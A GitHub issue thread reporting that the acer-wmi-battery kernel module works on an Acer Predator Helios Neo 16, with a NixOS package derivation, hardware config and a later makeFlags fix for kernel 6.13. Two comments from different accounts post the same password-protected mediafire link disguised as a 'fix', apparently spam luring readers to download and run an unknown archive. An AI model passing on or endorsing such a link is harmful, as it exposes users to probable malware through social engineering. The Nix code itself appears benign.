frederik-h/acer-wmi-battery #60: Works on Acer Predator Helios Neo 16 (PHN16-71) + Package for nix!

itm154, 2024-08-31:
Works fine on my Helios even with NixOS. For anyone who's using it here's the package, you may need to change some things. You also might want to use the [acer-predator-turbo-and-rgb-keyboard-linux-module](https://github.com/JafarAkhondali/acer-predator-turbo-and-rgb-keyboard-linux-module) (with [nix](https://github.com/JafarAkhondali/acer-predator-turbo-and-rgb-keyboard-linux-module/issues/136))

./packages/acer-wmi-battery/default.nix
```nix
{
  stdenv,
  lib,
  fetchFromGitHub,
  pkgs,
  kernel ? pkgs.linuxPackages_zen.kernel, # You might need to change this depending on the kernel you're using
  kmod,
}:
stdenv.mkDerivation rec {
  name = "acer-wmi-battery-${version}-${kernel.version}";
  version = "0.1.0";

  src = fetchFromGitHub {
    owner = "frederik-h";
    repo = "acer-wmi-battery";
    rev = "v${version}";
    sha256 = "0b8h4qgqdgmzmzb2hvsh4psn3d432klxdfkjsarpa89iylr4irfs";
  };

  setSourceRoot = ''export sourceRoot=$(pwd)/source'';
  nativeBuildInputs = kernel.moduleBuildDependencies;

  makeFlags =
    kernel.makeFlags
    ++ [
      "-C"
      "${kernel.dev}/lib/modules/${kernel.modDirVersion}/build"
      "M=$(sourceRoot)"
    ];
  buildFlags = ["modules"];
  installFlags = ["INSTALL_MOD_PATH=${placeholder "out"}"];
  installTargets = ["modules_install"];

  meta = with lib; {
    description = "A linux kernel driver for the Acer WMI battery health control interface";
    homepage = "https://github.com/frederik-h/acer-wmi-battery";
    license = licenses.gpl2;
    maintainers = [maintainers.itm154];
    platforms = platforms.linux;
  };
}
```

./{your nixos/hardware config}
```nix
{
  config,
  lib,
  pkgs,
  modulesPath,
  ...
}: let
. . .
# Im using snowfall-lib here so you might need to change this to use callpackage
# acer-wmi-battery = config.boot.kernelPackages.callPackage ./acer-wmi-battery.nix {};
  acer-wmi-battery = pkgs.custom.acer-wmi-battery; 
. . .
in {
. . .
# Dont forget to include these
  boot.extraModulePackages = [acer-wmi-battery];
  boot.kernelModules = ["wmi" "acer-wmi-battery"];
. . .
}
```
Then you can use the commands from the instructions
`echo 1 | sudo tee /sys/bus/wmi/drivers/acer-wmi-battery/health_mode` etc...

rickdoq, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

KrissV2, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

kerosina, 2025-03-05:
PSA: on latest NixOS unstable, with the 6.13 kernel this package stops working. On the default.nix, you must insert `"KBUILD_OUTPUT=${kernel.dev}/lib/modules/${kernel.modDirVersion}/build"` to the makeFlags to fix it, for now.

frederik-h, 2025-03-16:
> Works fine on my Helios even with NixOS.

Thanks for the report and the NixOS instructons! @kerosina Thanks for the update!

closed 2025-03-16 by frederik-h